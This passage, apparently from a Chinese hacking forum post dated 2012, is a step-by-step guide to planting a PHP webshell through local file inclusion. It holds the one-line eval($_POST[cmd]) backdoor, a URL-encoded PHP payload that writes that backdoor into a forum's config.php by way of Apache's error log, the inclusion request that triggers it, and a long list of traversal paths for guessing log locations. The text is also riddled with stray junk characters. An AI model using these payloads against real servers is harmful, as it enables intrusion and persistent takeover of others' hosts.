因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
# i Y+ I' y3 N& o) K
1 `! g/ {8 S* m比如还是这句一句话木马
% n, ^8 |) C V8 }<?eval($_POST[cmd]);?>
9 G0 |$ E$ r2 ^" I5 [/ R
# p; k% q Y ^1 b/ B到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
2 Q! M4 `9 ]1 h5 u k* ^fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
$ B3 Z' h( B; y- ]" D
9 A# {% c5 X- C4 L. k1 w<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
# e. G0 v, w8 b: K3 X9 g* Gfclose($fp);?> //在config.php里写入一句木马语句 ) [+ [6 W8 {. j3 o" O
( K/ N9 F" A8 d# I; w4 y2 O
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
0 A) I' e9 P/ E8 ~3 b% \- y8 {) w转换为
- P5 O: I I$ F%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F C) @; D5 _; D, C
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
9 @4 ]4 a" i, E! S& Y%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B ( H H% X+ d. y. X7 D
fclose%28%24fp%29%3B%3F%3E
3 I& L/ v) A, H5 r' O( S我们提交
6 [% m' Z7 _$ H& L+ L/ l$ Mhttp://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww ( p1 d" O- y8 I1 }
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
* Q% A& ?$ i% r; I* N" o8 y) r- G& G%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B " W3 j' ^. q- v% ]
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
+ g9 m T* v2 h7 j1 B9 c ^ h3 s! |
6 P* X: `* M3 O这样就错误日志里就记录下了这行写入webshell的代码。
) `- s; P9 W g% H我们再来包含日志,提交 : [( ?5 v# U l2 u, V s
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
- ]# R' G% |- x
' X; S8 f. M% c9 H. u这样webshell就写入成功了,config.php里就写入一句木马语句
) K9 F7 `2 N- }. j* YOK. : O% n" V, f( q- A
http://www.xxx.com/forum/config.php这个就成了我们的webshell ( p4 {' b# n/ \' ]! k2 L
直接用lanker的客户端一连,主机就是你的了。 " {" V) n+ Z7 S
' Q5 B* J4 b( I1 y$ w8 G" p# P
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 4 C/ o( b0 u% M6 r! I7 d3 W
, K$ C1 M' v; V: C8 U! o其他的日志路径,你可以去猜,也可以参照这里。 9 x: P) Y/ d! K! V' @! e+ x
../../../../../../../../../../var/log/httpd/access_log # Z8 R4 {, N* `) _7 `2 ?( z
../../../../../../../../../../var/log/httpd/error_log ' _* \/ q# l" ^ m5 _$ P0 {" X
../apache/logs/error.log " l0 ~: K |) @5 }; S- Y& d
../apache/logs/access.log 7 T3 \; c- O6 \
../../apache/logs/error.log 9 x3 O+ i7 K, u
../../apache/logs/access.log / t/ N& Z# l8 s- k
../../../apache/logs/error.log ' S$ _7 V, |* `. j3 e" {9 q8 i" t7 ~
../../../apache/logs/access.log / E- ~* G8 y0 G. }- L: d
../../../../../../../../../../etc/httpd/logs/acces_log 6 p( f$ [% O- E; a& O6 Y/ K, K, z) F
../../../../../../../../../../etc/httpd/logs/acces.log
" C# q) Y3 | e0 p: ?: J../../../../../../../../../../etc/httpd/logs/error_log
0 F" U- w2 N3 ^6 B, [+ E o( d../../../../../../../../../../etc/httpd/logs/error.log & u* z# q% g- p" V# w7 T! A
../../../../../../../../../../var/www/logs/access_log
% B; z; y, B1 h3 j' C, d7 e% {../../../../../../../../../../var/www/logs/access.log
" `) C+ c4 R+ L! U5 w E7 S! l../../../../../../../../../../usr/local/apache/logs/access_log
5 p7 o: |3 F# i3 ~4 H5 \! `2 R../../../../../../../../../../usr/local/apache/logs/access.log
* u$ k1 E/ W/ c/ ]1 d5 [../../../../../../../../../../var/log/apache/access_log
' v7 A0 T& {& a- t/ }- X../../../../../../../../../../var/log/apache/access.log ) J- @- v( I t1 K
../../../../../../../../../../var/log/access_log
* M% n: _. n8 Y* i( N1 O& l- @../../../../../../../../../../var/www/logs/error_log
1 Q7 L- D3 V- H' k../../../../../../../../../../var/www/logs/error.log 1 i+ Y! n! C* W. B
../../../../../../../../../../usr/local/apache/logs/error_log
. h5 |* ?4 g5 w, f../../../../../../../../../../usr/local/apache/logs/error.log
" Q6 G( r% M; Z../../../../../../../../../../var/log/apache/error_log , r4 D; e1 }3 h6 }. o% i9 x
../../../../../../../../../../var/log/apache/error.log
' t8 b" q4 _& k2 s) K../../../../../../../../../../var/log/access_log
2 }% ~* U# I4 l# w6 U../../../../../../../../../../var/log/error_log ) z, ?, [( ]& A/ ]1 ?6 T
/var/log/httpd/access_log $ R& ?! a3 `9 O9 O+ s- e- {
/var/log/httpd/error_log
; I+ F2 a8 y( p; i: d../apache/logs/error.log
* z& \0 |4 W2 s. i2 s9 {0 u& L3 X../apache/logs/access.log * A, W+ T U7 {+ @
../../apache/logs/error.log - c" Y; }& F/ F- v
../../apache/logs/access.log ; g; q) k( i" {( G0 T9 f0 `
../../../apache/logs/error.log " X2 e4 f- n# ^- F
../../../apache/logs/access.log
2 s$ e9 ^1 K- a, U [% y/etc/httpd/logs/acces_log 1 L0 Y7 |% g; O' m6 C4 L, K
/etc/httpd/logs/acces.log
; r- W$ J, }% z1 l/etc/httpd/logs/error_log + {( D/ x- Q: I' A M
/etc/httpd/logs/error.log # e: [' Z0 |) }! _
/var/www/logs/access_log ) k9 g* }' F$ _( @
/var/www/logs/access.log - |* w' l- [$ ^
/usr/local/apache/logs/access_log 4 i' z0 O. [% @9 y
/usr/local/apache/logs/access.log
& [; M% X. k l7 k/ s; Q. m6 D/var/log/apache/access_log 0 }9 b: {3 S6 E* a
/var/log/apache/access.log
3 a5 _: s# U" y. u' I) d, @# P2 {/var/log/access_log
0 q9 s. w7 x7 v6 ^" K' }/var/www/logs/error_log 6 `( s( ~- _1 b A M, F! F) S
/var/www/logs/error.log * S# L h. F9 W+ S; \
/usr/local/apache/logs/error_log
5 o- e0 R M6 F% N; R/usr/local/apache/logs/error.log ! A* f4 o6 b& n( Q
/var/log/apache/error_log 7 x8 P0 o/ g4 P& k. ?, c) V
/var/log/apache/error.log 2 T. s H& B2 j* x$ ^+ c- u- o& @
/var/log/access_log
: n+ y, i/ U0 v3 c6 e! ^/var/log/error_log |
发表于 2012-9-15 14:27:40
收藏
支持
反对